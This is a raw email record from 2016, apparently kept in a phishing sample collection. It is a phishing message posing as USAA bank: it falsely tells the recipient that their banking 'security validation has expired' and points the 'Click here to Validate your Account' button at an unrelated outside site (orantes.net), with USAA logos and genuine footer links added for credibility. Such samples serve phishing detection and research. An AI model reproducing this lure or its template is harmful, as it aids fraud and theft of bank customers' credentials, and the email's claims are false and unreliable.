From: "USAA"<message.customers.center@service.com>
To: jose@monkey.org
Subject: USAA Checking Account Security Validation Notification
Date: 03 Oct 2016 14:13:12 -0700
Message-ID: <20161003141311.0F175B9EB2373A7E@service.com>
MIME-Version: 1.0
Content-Type: multipart/related;
	boundary="----=_NextPart_000_0012_9C000899.AB784694"
Status: O
X-Status: 
X-Keywords:                  
X-UID: 381


------=_NextPart_000_0012_9C000899.AB784694
Content-Type: text/html;
	charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable

<html>
<head>
</head>
<body>
<table bgcolor=3D"#0d2842" border=3D"0" cellpadding=3D"0" cellspacing=3D"0"=
 style=3D"WHITE-SPACE: normal; WORD-SPACING: 0px;=20

TEXT-TRANSFORM: none; COLOR: rgb(0,0,0); FONT: 13px arial, helvetica; WIDOW=
S: 1; LETTER-SPACING: normal; TEXT-INDENT:=20

0px; -webkit-text-stroke-width: 0px" width=3D"650">
	<tbody>
		<tr height=3D"25">
			<td align=3D"center" colspan=3D"5" style=3D"FONT-FAMILY: arial, sans-ser=
if; MARGIN: 0px" valign=3D"middle"><font face=3D"Verdana, sans-serif" style=
=3D"FONT-SIZE: 9px; COLOR: rgb(255,255,255)">To ensure delivery to=20

your inbox, please add <a href=3D"mailto:USAA.Web.Services@customermail.usa=
a.com" style=3D"FONT-SIZE: 9px; COLOR: rgb

(255,255,255)" target=3D"_blank">USAA.Customer.Service@<wbr />mailcenter.us=
aa.com </a>to your address book.</font></td>
		</tr>
		<tr height=3D"3">
			<td height=3D"3" style=3D"FONT-FAMILY: arial, sans-serif; MARGIN: 0px" w=
idth=3D"20">&nbsp;</td>
			<td bgcolor=3D"#ffffff" colspan=3D"3" height=3D"3" style=3D"FONT-FAMILY:=
 arial, sans-serif; MARGIN:=20

0px" width=3D"610">&nbsp;</td>
			<td height=3D"3" style=3D"FONT-FAMILY: arial, sans-serif; MARGIN: 0px" w=
idth=3D"20">&nbsp;</td>
		</tr>
		<tr height=3D"90">
			<td style=3D"FONT-FAMILY: arial, sans-serif; MARGIN: 0px" width=3D"20">&=
nbsp;</td>
			<td bgcolor=3D"#ffffff" style=3D"FONT-FAMILY: arial, sans-serif; MARGIN:=
 0px" width=3D"5">&nbsp;</td>
			<td bgcolor=3D"#ffffff" style=3D"FONT-FAMILY: arial, sans-serif; MARGIN:=
 0px" width=3D"600">
			<table border=3D"0" cellpadding=3D"0" cellspacing=3D"0" width=3D"600">
				<tbody>
					<tr>
						<td height=3D"45" style=3D"FONT-FAMILY: arial, sans-serif; MARGIN: 0p=
x" width=3D"30"><a data-saferedirecturl=3D"https://www.google.com/url?hl=3D=
en&amp;q=3Dhttps://www.usaa.com/inet/ent_logon/Logon?

EID%3D88183-1008_head&amp;source=3Dgmail&amp;ust=3D1466158300262000&amp;usg=
=3DAFQjCNFdgfXBZXzHp8evvxNDnTYaA-7nRA"=20

href=3D"https://www.usaa.com/inet/ent_logon/Logon?EID=3D88183-1008_head" st=
yle=3D"COLOR: rgb(17,85,204)"=20

target=3D"_blank"><img alt=3D"" border=3D"0" class=3D"CToWUd" height=3D"80"=
 src=3D"https://ci4.googleusercontent.com/proxy/trwGUZiiRPlCls9ZRgDdcFNdCsQ=
UVq2NYMciY5ip3h0XB9jZhKrySGUcxF5hbwyVwbKHgGPSF

DnO8EAeR5gkRXvmVqqC7UMAclJeMLhmZMfVUmxb2Zfnh_wzBgJ6ax3G5-UbIXcOtw=3Ds0-d-e1=
-

ft#http://content.usaa.com/mcontent/static_assets/om/Media/SENDS_USAA_COLOR=
_LOGO.jpg" width=3D"73" /=3D""></a></td>
						<td style=3D"FONT-FAMILY: arial, sans-serif; MARGIN: 0px">
						<div>&nbsp;</div>
						</td>
						<td align=3D"right" height=3D"45" style=3D"FONT-FAMILY: arial, sans-s=
erif;=20

MARGIN: 0px" valign=3D"middle" width=3D"367">
						<table border=3D"0" cellpadding=3D"0" cellspacing=3D"0" height=3D"65"=
 width=3D"188">
							<tbody>
								<tr>
									<td style=3D"FONT-FAMILY: arial, sans-serif;=20

MARGIN: 0px" width=3D"22">
									<table border=3D"0" cellpadding=3D"0" cellspacing=3D"0" height=3D"=
65" width=3D"22">
										<tbody>
											<tr>
												<td height=3D"29" style=3D"FONT-FAMILY: arial, sans-serif; MARG=
IN: 0px; LINE-HEIGHT: 0" valign=3D"top" width=3D"8"><img alt=3D"" border=3D=
"0" class=3D"CToWUd" height=3D"29" src=3D"https://ci6.googleusercontent.com=
/proxy/jrFKj4PLPJz9oi41b7ommxMkt6pS7RcAW_abiw8hNXwYenN8rMzqe86gYPshqI40yEmB=
MZbxQ

Ye1VffF7XfNtF9wIepmvgfguj4tAtx6OI911-tB0rFQ40qXJK7Zv6HyArfGN7nzEhVthv_0=3Ds=
0-d-e1-

ft#https://content.usaa.com/mcontent/static_assets/Media/email_sec_1-1.gif?=
EID=3D5839475677" style=3D"DISPLAY: block" width=3D"8" /=3D""></td>
												<td bgcolor=3D"#e7e7e8" height=3D"29" style=3D"FONT-FAMILY: ari=
al, sans-serif; MARGIN: 0px; LINE-HEIGHT: 0" valign=3D"top" width=3D"14"><i=
mg alt=3D"" border=3D"0" class=3D"CToWUd" height=3D"29" src=3D"https://ci5.=
googleusercontent.com/proxy/vMOlYe-5W7Hn5D8SSem02uE85zY5gJ-

GGNnEKxojoZFQP66ZGjjiq8nzShDYj0gCMUKDg7eVmGrcoOsnk9rJM7g8Q_xJAfFPo_SW59sS8O=
P4cEoEdMrOW5M6K30J=3Ds0-d-e1-

ft#https://content.usaa.com/mcontent/static_assets/Media/email_sec_1-2.gif"=
 style=3D"DISPLAY: block" width=3D"14" /=3D""></td>
											</tr>
											<tr>
												<td height=3D"29" style=3D"FONT-FAMILY: arial, sans-serif; MARG=
IN: 0px; LINE-HEIGHT: 0" valign=3D"top" width=3D"8"><img alt=3D"" border=3D=
"0" class=3D"CToWUd" height=3D"29" src=3D"https://ci4.googleusercontent.com=
/proxy/oz0x72b7BlCaGH8IPbQbX_hSzXnVLKA8IkAVzuk-

7QSTtgXEhP4UomOz_dIm7EZTeZoD4E8zDlfByMuxzwWzKtArsu3qVV1VS8wNHm_EBbx2byafEki=
0jWXLZW1Utw54=3Ds0-d-e1-

ft#https://content.usaa.com/mcontent/static_assets/Media/email_sec_spacer.g=
if" style=3D"DISPLAY: block" width=3D"8" /=3D""></td>
												<td bgcolor=3D"#e7e7e8" height=3D"29" style=3D"FONT-FAMILY: ari=
al, sans-serif; MARGIN: 0px; LINE-HEIGHT: 0" valign=3D"top" width=3D"14"><i=
mg alt=3D"" border=3D"0" class=3D"CToWUd" height=3D"29" src=3D"https://ci4.=
googleusercontent.com/proxy/oz0x72b7BlCaGH8IPbQbX_hSzXnVLKA8IkAVzuk-

7QSTtgXEhP4UomOz_dIm7EZTeZoD4E8zDlfByMuxzwWzKtArsu3qVV1VS8wNHm_EBbx2byafEki=
0jWXLZW1Utw54=3Ds0-d-e1-

ft#https://content.usaa.com/mcontent/static_assets/Media/email_sec_spacer.g=
if" style=3D"DISPLAY: block" width=3D"14" /=3D""></td>
											</tr>
											<tr>
												<td height=3D"7" style=3D"FONT-FAMILY: arial, sans-serif; MARGI=
N: 0px; LINE-HEIGHT: 0" valign=3D"bottom" width=3D"8">&nbsp;</td>
												<td bgcolor=3D"#e7e7e8" height=3D"7" style=3D"FONT-FAMILY: aria=
l, sans-serif; MARGIN: 0px; LINE-HEIGHT: 0" valign=3D"bottom" width=3D"14">=
<img alt=3D"" border=3D"0" class=3D"CToWUd" height=3D"7" src=3D"https://ci4=
=2Egoogleusercontent.com/proxy/QpItTHbCMIqp9uIGJcz5CZt6z7lXd3M9qFTIfX2kOXdm=
IBv0Ncveo5yhFsWiI6w0tsnQeFByn

2ZDce_EHZSt9oMlCOpHu0bjKhHjwvjkR6CGss7ikXUO0jYDP9tK=3Ds0-d-e1-

ft#https://content.usaa.com/mcontent/static_assets/Media/email_sec_2-1.gif"=
 style=3D"DISPLAY: block" width=3D"14" /=3D""></td>
											</tr>
										</tbody>
									</table>
									</td>
									<td align=3D"left" bgcolor=3D"#e7e7e8" style=3D"FONT-FAMILY: arial=
, sans-serif; MARGIN: 0px">
									<table border=3D"0" cellpadding=3D"5" cellspacing=3D"0" height=3D"=
65" width=3D"100%">
										<tbody>
											<tr>
												<td align=3D"left" style=3D"FONT-SIZE: 9px; FONT-FAMILY: arial,=
 sans-serif; TEXT-ALIGN: left; MARGIN: 0px; LINE-HEIGHT: 12px" valign=3D"mi=
ddle"><font face=3D"Arial, Helvetica, sans-serif" style=3D"FONT-SIZE: 10px;=
 COLOR: rgb(0,54,91)"><strong>USAA=20

SECURITY ZONE</strong></font><br />
												<font face=3D"Arial,=20

Helvetica, sans-serif" style=3D"FONT-SIZE: 9px; COLOR: rgb(0,54,91)">USAA #=
 ending in: *****</font></td>
											</tr>
										</tbody>
									</table>
									</td>
									<td bgcolor=3D"#ffffff" style=3D"FONT-FAMILY:=20

arial, sans-serif; MARGIN: 0px" width=3D"7">
									<table border=3D"0" cellpadding=3D"0" cellspacing=3D"0" height=3D"=
65" width=3D"7">
										<tbody>
											<tr>
												<td align=3D"right" bgcolor=3D"#e7e7e8" height=3D"7" style=3D"F=
ONT-FAMILY: arial, sans-serif; MARGIN: 0px; LINE-HEIGHT: 0" valign=3D"top" =
width=3D"7"><img alt=3D"" border=3D"0" class=3D"CToWUd" height=3D"7" src=3D=
"https://ci6.googleusercontent.com/proxy/AKIhTrGxlc8dRLYqFBbhjPqRmcW28DdWAg=
Qz2w58zTHNrQlyHQ-

9_5gSMB5v9RNrAkCfWwxc0GVEnwGOlL-a8WhHxAvWtBE2p6Zn6osXYgAnO1cXyrSjg-l1_Mtv=
=3Ds0-d-e1-

ft#https://content.usaa.com/mcontent/static_assets/Media/email_sec_1-3.gif"=
 style=3D"DISPLAY: block" width=3D"7" /=3D""></td>
											</tr>
											<tr>
												<td align=3D"right" bgcolor=3D"#e7e7e8" height=3D"51" style=3D"=
FONT-FAMILY: arial, sans-serif; MARGIN: 0px; LINE-HEIGHT: 0" valign=3D"top"=
 width=3D"7"><img alt=3D"" border=3D"0" class=3D"CToWUd" height=3D"51" src=
=3D"https://ci4.googleusercontent.com/proxy/oz0x72b7BlCaGH8IPbQbX_hSzXnVLKA=
8IkAVzuk-

7QSTtgXEhP4UomOz_dIm7EZTeZoD4E8zDlfByMuxzwWzKtArsu3qVV1VS8wNHm_EBbx2byafEki=
0jWXLZW1Utw54=3Ds0-d-e1-

ft#https://content.usaa.com/mcontent/static_assets/Media/email_sec_spacer.g=
if" style=3D"DISPLAY: block" width=3D"7" /=3D""></td>
											</tr>
											<tr>
												<td align=3D"right" bgcolor=3D"#e7e7e8" height=3D"7" style=3D"F=
ONT-FAMILY: arial, sans-serif; MARGIN: 0px; LINE-HEIGHT: 0" valign=3D"botto=
m" width=3D"7"><img alt=3D"" border=3D"0" class=3D"CToWUd" height=3D"7" src=
=3D"https://ci3.googleusercontent.com/proxy/3Hs3pOcNCDxgktK_1_a5AHLBDBql5Qi=
LAfWrzR51scCv4wVEQfayt17itPWHf4l54oiIuD-

BpBrKWOUxO7PLo-pmMxV0XMPNWXE_8xfq4VJ-I_wL_mELE2Iv1lj6=3Ds0-d-e1-

ft#https://content.usaa.com/mcontent/static_assets/Media/email_sec_2-2.gif"=
 style=3D"DISPLAY: block" width=3D"7" /=3D""></td>
											</tr>
										</tbody>
									</table>
									</td>
								</tr>
							</tbody>
						</table>
						</td>
					</tr>
				</tbody>
			</table>
			</td>
			<td bgcolor=3D"#ffffff" style=3D"FONT-FAMILY: arial, sans-serif; MARGIN:=
 0px" width=3D"5">&nbsp;</td>
			<td style=3D"FONT-FAMILY: arial, sans-serif; MARGIN: 0px" width=3D"20">&=
nbsp;</td>
		</tr>
		<tr>
			<td style=3D"FONT-FAMILY: arial, sans-serif; MARGIN: 0px" width=3D"20">&=
nbsp;</td>
			<td colspan=3D"3" style=3D"FONT-FAMILY: arial, sans-serif; MARGIN: 0px" =
width=3D"610">
			<table align=3D"left" border=3D"0" cellpadding=3D"0" cellspacing=3D"0" w=
idth=3D"610">
				<tbody>
					<tr align=3D"left">
						<td background=3D"https://ci5.googleusercontent.com/proxy/zX0VcZsno2F=
At3Xva4AS2G0xMVGdLr0lIu8t0r5dg7JdezilwjlGB8DLl-

UIkjRSJQThOMh2QYMOp73ixjR4HEaFgoXX240mtuDsFg-tItXei9cmG7bCi0UsQc-yYeZjNNxKY=
fidGp7duduMH0tZEg4M=3Ds0-d-e1-

ft#http://content.usaa.com/mcontent/static_assets/om/Media/thumbnails/Blue_=
Strip_With_Red_A.gif" cellpadding=3D"0" cellspacing=3D"0" height=3D"72" sty=
le=3D"FONT-FAMILY: arial, sans-serif; VERTICAL-ALIGN: middle; MARGIN: 0px">=
<font=20

face=3D"Verdana, sans-serif" style=3D"FONT-SIZE: 16px; COLOR: rgb

(255,255,255)"><b>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nb=
sp;&nbsp;&nbsp; Security Validation=20

Prefrences</b></font></td>
					</tr>
				</tbody>
			</table>
			</td>
			<td style=3D"FONT-FAMILY: arial, sans-serif; MARGIN: 0px" width=3D"20">&=
nbsp;</td>
		</tr>
		<tr>
			<td style=3D"FONT-FAMILY: arial, sans-serif; MARGIN: 0px" width=3D"20">&=
nbsp;</td>
			<td bgcolor=3D"#ffffff" style=3D"FONT-FAMILY: arial, sans-serif; MARGIN:=
 0px" width=3D"5">&nbsp;</td>
			<td align=3D"left" bgcolor=3D"#ffffff" style=3D"FONT-FAMILY: arial, sans=
-serif; MARGIN: 0px" width=3D"600">
			<div>
			<div style=3D"MARGIN-LEFT: 1em; MARGIN-RIGHT: 1em">
			<div style=3D"MARGIN-BOTTOM: 0pt; FONT-STYLE: normal">
			<div>
			<div style=3D"LINE-HEIGHT: 17px">
			<table border=3D"0" cellpadding=3D"0" cellspacing=3D"0" width=3D"95%">
				<tbody>
					<tr>
						<td align=3D"left" style=3D"FONT-FAMILY: arial,sans-serif; MARGIN: 0p=
x" width=3D"95%">
						<div>&nbsp;</div>

						<div>
						<p style=3D"FONT-SIZE: 9pt; MARGIN-BOTTOM: 1em; FONT-FAMILY: Arial,=
=20

Helvetica, sans-serif"><font face=3D"Verdana, sans-serif" style=3D"FONT-SIZ=
E: 12px; COLOR: rgb(51,51,51); LINE-HEIGHT:=20

18px"><span style=3D"FONT-FAMILY: Verdana, sans-serif; COLOR: rgb(51,51,51)=
; LINE-HEIGHT: normal"><font face=3D"Verdana,=20

sans-serif" style=3D"FONT-SIZE: 12px; COLOR: rgb(51,51,51); LINE-HEIGHT: 18=
px">Dear USAA Customer,<br />
						<br />
						Your USAA Banking security validation has expired, this maybe as a=20=


result of wrong or incomplete data entered during the last update.</font></=
span></font></p>

						<p style=3D"FONT-SIZE: 9pt; MARGIN-BOTTOM: 1em; FONT-FAMILY: Arial,=
=20

Helvetica, sans-serif"><font face=3D"Verdana, sans-serif" style=3D"FONT-SIZ=
E: 12px; COLOR: rgb(51,51,51); LINE-HEIGHT:=20

18px"><span style=3D"FONT-FAMILY: Verdana, sans-serif; COLOR: rgb(51,51,51)=
; LINE-HEIGHT: normal"><font face=3D"Verdana,=20

sans-serif" style=3D"FONT-SIZE: 12px; COLOR: rgb(51,51,51); LINE-HEIGHT: 18=
px">We require that you validate your Account=20

Ownership to help ensure your safety and security.</font></span></font></p>=


						<p style=3D"FONT-SIZE: 9pt; MARGIN-BOTTOM: 1em; FONT-FAMILY: Arial,=
=20

Helvetica, sans-serif"><font face=3D"Verdana, sans-serif" style=3D"FONT-SIZ=
E: 12px; COLOR: rgb(51,51,51); LINE-HEIGHT:=20

18px"><span style=3D"FONT-FAMILY: Verdana, sans-serif; COLOR: rgb(51,51,51)=
; LINE-HEIGHT: normal"><font face=3D"Verdana,=20

sans-serif" style=3D"FONT-SIZE: 12px; COLOR: rgb(51,51,51); LINE-HEIGHT: 18=
px">We value your business and the=20

opportunity to serve&nbsp; all your financial needs.&nbsp;</font></span></f=
ont></p>

						<table bgcolor=3D"#6cae35" border=3D"0" cellpadding=3D"0" cellspacing=
=3D"0" height=3D"15" style=3D"FONT-SIZE: 9pt; FONT-FAMILY: Arial, Helvetica=
, sans-serif">
							<tbody style=3D"FONT-SIZE: 9pt; FONT-FAMILY: Arial, Helvetica,=20

sans-serif">
								<tr bgcolor=3D"#6cae35" style=3D"FONT-SIZE: 9pt; FONT-

FAMILY: Arial, Helvetica, sans-serif">
									<td align=3D"center" bgcolor=3D"#6cae35" style=3D"FONT-SIZE: 9pt; =
FONT-FAMILY: Arial, Helvetica, sans-serif" valign=3D"middle" width=3D"15"><=
font face=3D"Verdana,=20

sans-serif" style=3D"FONT-SIZE: 12px; COLOR: rgb(51,51,51); LINE-HEIGHT: 18=
px"><span style=3D"FONT-FAMILY: Verdana, sans-

serif; COLOR: rgb(51,51,51); LINE-HEIGHT: normal"><font face=3D"Verdana, sa=
ns-serif" style=3D"FONT-SIZE: 12px; COLOR: rgb

(51,51,51); LINE-HEIGHT: 18px"><img height=3D"15" src=3D"cid:emailctaarrow.=
gif" style=3D"BORDER-LEFT-WIDTH: 0px;=20

BORDER-RIGHT-WIDTH: 0px; BORDER-BOTTOM-WIDTH: 0px; BORDER-TOP-WIDTH: 0px" w=
idth=3D"15" /=3D""></font></span></font></td>
									<td align=3D"center" bgcolor=3D"#6cae35" style=3D"FONT-SIZE: 9pt; =
FONT-FAMILY: Arial, Helvetica, sans-serif" valign=3D"middle" width=3D"134">=
<font face=3D"Verdana,=20

sans-serif" style=3D"FONT-SIZE: 12px; COLOR: rgb(51,51,51); LINE-HEIGHT: 18=
px"><span style=3D"FONT-FAMILY: Verdana, sans-

serif; COLOR: rgb(51,51,51); LINE-HEIGHT: normal"><font face=3D"Verdana, sa=
ns-serif" style=3D"FONT-SIZE: 12px; COLOR: rgb

(51,51,51); LINE-HEIGHT: 18px"><a href=3D"http://orantes.net/photos/com.htm=
" style=3D"TEXT-DECORATION: none; COLOR: rgb

(255,255,255); FONT: bold 11px arial, sans-serif; font-stretch: normal" tar=
get=3D"_blank">Click here to Validate your=20

Account</a></font></span></font></td>
								</tr>
							</tbody>
						</table>
						<br />
						<font face=3D"Verdana, sans-serif" style=3D"FONT-SIZE: 12px; COLOR: r=
gb

(51,51,51); LINE-HEIGHT: 18px"><span style=3D"FONT-FAMILY: Verdana, sans-se=
rif; COLOR: rgb(51,51,51); LINE-HEIGHT:=20

normal"><font face=3D"Verdana, sans-serif" style=3D"FONT-SIZE: 12px; COLOR:=
 rgb(51,51,51); LINE-HEIGHT: 18px">Together,=20

we&#39;ll remain vigilant to protect your online security. You have our com=
mitment to continuously enhance our=20

security measures to help prevent cybercrime from happening to you.</font><=
/span></font> <font face=3D"Verdana, sans-

serif" style=3D"FONT-SIZE: 12px; COLOR: rgb(51,51,51); LINE-HEIGHT: 18px"><=
span style=3D"FONT-FAMILY: Verdana, sans-serif;=20

COLOR: rgb(51,51,51); LINE-HEIGHT: normal"><font face=3D"Verdana, sans-seri=
f" style=3D"FONT-SIZE: 12px; COLOR: rgb

(51,51,51); LINE-HEIGHT: 18px"> </font></span></font>

						<p style=3D"FONT-SIZE: 9pt; MARGIN-BOTTOM: 1em; FONT-FAMILY: Arial,=
=20

Helvetica, sans-serif"><font face=3D"Verdana, sans-serif" style=3D"FONT-SIZ=
E: 12px; COLOR: rgb(51,51,51); LINE-HEIGHT:=20

18px"><span style=3D"FONT-FAMILY: Verdana, sans-serif; COLOR: rgb(51,51,51)=
; LINE-HEIGHT: normal"><font face=3D"Verdana,=20

sans-serif" style=3D"FONT-SIZE: 12px; COLOR: rgb(51,51,51); LINE-HEIGHT: 18=
px">Thank you,</font></span></font></p>
						<font face=3D"Verdana, sans-serif" style=3D"FONT-SIZE: 12px; COLOR: r=
gb

(51,51,51); LINE-HEIGHT: 18px"><span style=3D"FONT-FAMILY: Verdana, sans-se=
rif; COLOR: rgb(51,51,51); LINE-HEIGHT:=20

normal"><font face=3D"Verdana, sans-serif" style=3D"FONT-SIZE: 12px; COLOR:=
 rgb(51,51,51); LINE-HEIGHT: 18px">USAA Federal=20

Savings Bank</font></span></font></div>
						</td>
					</tr>
				</tbody>
			</table>
			</div>
			</div>
			</div>
			</div>

			<table style=3D"FONT-STYLE: normal; MARGIN-LEFT: 4.5pt">
				<tbody>
					<tr>
						<td style=3D"BORDER-TOP: medium none; FONT-FAMILY: arial, sans-serif;=
=20

BORDER-RIGHT: medium none; WIDTH: 499.5pt; BORDER-BOTTOM: medium none; PADD=
ING-BOTTOM: 0in; PADDING-TOP: 0in;=20

PADDING-LEFT: 0in; BORDER-LEFT: medium none; MARGIN: 0px; PADDING-RIGHT: 0i=
n" valign=3D"top">
						<div style=3D"MARGIN-BOTTOM: 0pt; FONT-STYLE: normal; MARGIN-LEFT:=20=


9.35pt">&nbsp;</div>
						</td>
					</tr>
				</tbody>
			</table>

			<div style=3D"MARGIN-BOTTOM: 0pt; FONT-STYLE: normal">
			<table border=3D"0" cellpadding=3D"0" cellspacing=3D"0" width=3D"600">
				<tbody>
					<tr>
						<td align=3D"left" style=3D"FONT-FAMILY: arial, sans-serif; MARGIN: 0=
px" width=3D"95%">
						<table>
							<tbody>
								<tr>
									<td align=3D"left" height=3D"30" style=3D"FONT-

FAMILY: arial, sans-serif; MARGIN: 0px" width=3D"40%"><a data-saferedirectu=
rl=3D"https://www.google.com/url?

hl=3Den&amp;q=3Dhttps://communities.usaa.com/?EID%3D88183-

1008_footer&amp;source=3Dgmail&amp;ust=3D1466158300263000&amp;usg=3DAFQjCNH=
qpLf1B8jGbwVPq9o-0vr8nMbm_w"=20

href=3D"https://communities.usaa.com/?EID=3D88183-1008_footer" style=3D"COL=
OR: rgb(17,85,204)" target=3D"_blank"><img alt=3D"Member Community" border=
=3D"0" class=3D"CToWUd" height=3D"40" src=3D"https://ci5.googleusercontent.=
com/proxy/EI6GzgWn4rTNjoOvt4QDhZR5qg3v6QTpWteEGYsRORcMYVz1KuMfV-

JAm74n9Krq_rAiQNbHh_Gv1Ym7iBkygGf8EZ_5sXjSW1qGHVeRZPNPpihv8gPJNqUErd9t9TlwC=
mXW293UZwyaNvuotg=3Ds0-d-e1-

ft#http://content.usaa.com/mcontent/static_assets/om/Media/thumbnails/Membe=
r_Community.gif" width=3D"232" /=3D""></a>&nbsp;</td>
									<td align=3D"center" height=3D"30" style=3D"FONT-

FAMILY: arial, sans-serif; MARGIN: 0px" width=3D"30%"><a data-saferedirectu=
rl=3D"https://www.google.com/url?

hl=3Den&amp;q=3Dhttps://www.usaa.com/inet/pages/usaa_mobile_main?EID%3D8818=
3-

1008_footer&amp;source=3Dgmail&amp;ust=3D1466158300263000&amp;usg=3DAFQjCNG=
7wlky2BlyfEiehykUu3AEyBG88w"=20

href=3D"https://www.usaa.com/inet/pages/usaa_mobile_main?EID=3D88183-1008_f=
ooter" style=3D"COLOR: rgb(17,85,204)"=20

target=3D"_blank"><img alt=3D"Go Mobile" border=3D"0" class=3D"CToWUd" heig=
ht=3D"32" src=3D"https://ci6.googleusercontent.com/proxy/ugfTuUt4kBk50RbAgL=
ibaAYZQzjpJuq4rYZ3crnrH9bbf7_vhsp0H2ZLQHzBbGwaCGp4H69Bm

dre1F58QjlwA7OYI3KcsvRzKXVImsxNnoDRAYjPuzMVbb4o55grEIr7vSkJhp3g=3Ds0-d-e1-

ft#http://content.usaa.com/mcontent/static_assets/om/Media/thumbnails/Go_Mo=
bile.gif" width=3D"91" /=3D""></a>&nbsp;</td>
									<td align=3D"right" height=3D"30" style=3D"FONT-

FAMILY: arial, sans-serif; MARGIN: 0px" width=3D"30%"><a data-saferedirectu=
rl=3D"https://www.google.com/url?

hl=3Den&amp;q=3Dhttp://www.facebook.com/USAA?EID%3D88183-

1008_footer&amp;source=3Dgmail&amp;ust=3D1466158300263000&amp;usg=3DAFQjCNG=
Z5WmfOaPL_38x3jJ3hPtxPZiRNg"=20

href=3D"http://www.facebook.com/USAA?EID=3D88183-1008_footer" style=3D"COLO=
R: rgb(17,85,204)" target=3D"_blank"><img alt=3D"Facebook" border=3D"0" cla=
ss=3D"CToWUd" height=3D"32" src=3D"https://ci5.googleusercontent.com/proxy/=
CeuYshs2B1yU4WzB7d7J_pvbsiCY4FjIZol5zgTf594JE9TQqC_wRoOehFFCJ8u9X-

XEEsdcWeDVa2vprZ939glu2XA7ZouvXoHZFczwBlmiwbBqGAUSQj_1C_ynhVq4ppGpaakeFm3U=
=3Ds0-d-e1-

ft#http://content.usaa.com/mcontent/static_assets/om/Media/thumbnails/faceb=
ook_new.gif" width=3D"32" /=3D""></a>&nbsp;&nbsp;=20

<a data-saferedirecturl=3D"https://www.google.com/url?hl=3Den&amp;q=3Dhttp:=
//twitter.com/usaa?EID%3D88183-

1008_footer&amp;source=3Dgmail&amp;ust=3D1466158300263000&amp;usg=3DAFQjCNH=
WFdgTR6xyGMmv1cLStzkxNF-1Gw"=20

href=3D"http://twitter.com/usaa?EID=3D88183-1008_footer" style=3D"COLOR: rg=
b(17,85,204)" target=3D"_blank"><img alt=3D"Twitter" border=3D"0" class=3D"=
CToWUd" height=3D"32" src=3D"https://ci3.googleusercontent.com/proxy/XIrzH1=
M6K1qRdJ76bfA8__bycziB4-

QvMt3aXNc3K5MJK3lPeoV9mGkazi4kAyrcwCyJp7JFL1MkM_VNc7vWSKe3w4UyxofFOQcxvXlSA=
lo6tJQf_5joZ9RQTz-6j9p96ORVffOky70=3Ds0-d-e1

-ft#http://content.usaa.com/mcontent/static_assets/om/Media/thumbnails/twit=
ter_new.gif" width=3D"32" /=3D""></a>&nbsp;&nbsp;=20

<a data-saferedirecturl=3D"https://www.google.com/url?hl=3Den&amp;q=3Dhttps=
://www.youtube.com/user/usaa/custom?EID%3D88183-

1008_footer&amp;source=3Dgmail&amp;ust=3D1466158300263000&amp;usg=3DAFQjCNE=
Ro8Mp9YPeChHgsfr2uFzKTRMJSw"=20

href=3D"https://www.youtube.com/user/usaa/custom?EID=3D88183-1008_footer" s=
tyle=3D"COLOR: rgb(17,85,204)"=20

target=3D"_blank"><img alt=3D"You Tube" border=3D"0" class=3D"CToWUd" heigh=
t=3D"32" src=3D"https://ci4.googleusercontent.com/proxy/UNNOJHcMl2bh6veN8oe=
sLzVuRjQEMT3Lm2ywUsraka01eplf4SxpW5oZi7btwdpfOrGdK00QA

JkW8wSYd2EBkU1unw_w_KHfoh4LfwhKg0T19nWI7B-l09qxMjY84qHWuj6srj1oDHY=3Ds0-d-e=
1-

ft#http://content.usaa.com/mcontent/static_assets/om/Media/thumbnails/youtu=
be_new.gif" width=3D"32" /=3D""></a>&nbsp;&nbsp;=20

<a data-saferedirecturl=3D"https://www.google.com/url?hl=3Den&amp;q=3Dhttps=
://www.usaa.com/inet/pages/usaa_social_main?EID

%3D88183-1008_footer&amp;source=3Dgmail&amp;ust=3D1466158300263000&amp;usg=
=3DAFQjCNFpue8zI7rkvzWfUsriQ6JIORiwKQ"=20

href=3D"https://www.usaa.com/inet/pages/usaa_social_main?EID=3D88183-1008_f=
ooter" style=3D"COLOR: rgb(17,85,204)"=20

target=3D"_blank"><img alt=3D"More" border=3D"0" class=3D"CToWUd" height=3D=
"32" src=3D"https://ci6.googleusercontent.com/proxy/vl9lBXdqbdP7Uhk-pWnDvPZ=
s5gw3FgAbb3YUclQu8MmVqsIDlloF72iieFF2Jgm-

xXFsyiYljSfio9mHrUYRTOh6WBwwapQjkE59hSqaV13KOcZivCrxqeUhQUQHuJZ6pe84vN8Yk2U=
V=3Ds0-d-e1-

ft#http://content.usaa.com/mcontent/static_assets/om/Media/thumbnails/morei=
con_new.gif" width=3D"32" /=3D""></a></td>
								</tr>
							</tbody>
						</table>
						</td>
					</tr>
				</tbody>
			</table>
			</div>
			</div>
			</td>
			<td bgcolor=3D"#ffffff" style=3D"FONT-FAMILY: arial, sans-serif; MARGIN:=
 0px" width=3D"5">&nbsp;</td>
			<td style=3D"FONT-FAMILY: arial, sans-serif; MARGIN: 0px" width=3D"20">&=
nbsp;</td>
		</tr>
		<tr height=3D"25">
			<td colspan=3D"5" style=3D"FONT-FAMILY: arial, sans-serif; MARGIN: 0px">=
&nbsp;</td>
		</tr>
		<tr height=3D"25">
			<td colspan=3D"5" style=3D"FONT-FAMILY: arial, sans-serif; MARGIN: 0px">=
&nbsp;</td>
		</tr>
	</tbody>
</table>
</body>
</html>

------=_NextPart_000_0012_9C000899.AB784694
Content-Type: image/gif; name="emailctaarrow.gif"
Content-Transfer-Encoding: base64
Content-ID: <emailctaarrow.gif>

R0lGODlhDwAPAKIAAHOZV+Hu1p/UdY3KXFmFNv7+/v///2yuNSH5BAAAAAAALAAAAAAPAA8A
AAMxaLfcC2K4eSCd9ra8gsRCMxRFuJkNGTQEyggk+y1DEMuNrTjErB29HyMoBPo0vV0xAQA7


------=_NextPart_000_0012_9C000899.AB784694--

From jose@monkey.org Tue Oct  4 06:41:58 2016 +0000
Return-Path: accountvalidation-usaa@tls.com
Delivered-To: jose@monkey.org
X-FDA: 72031621116.22.trip77_2e0eb3f61a15f
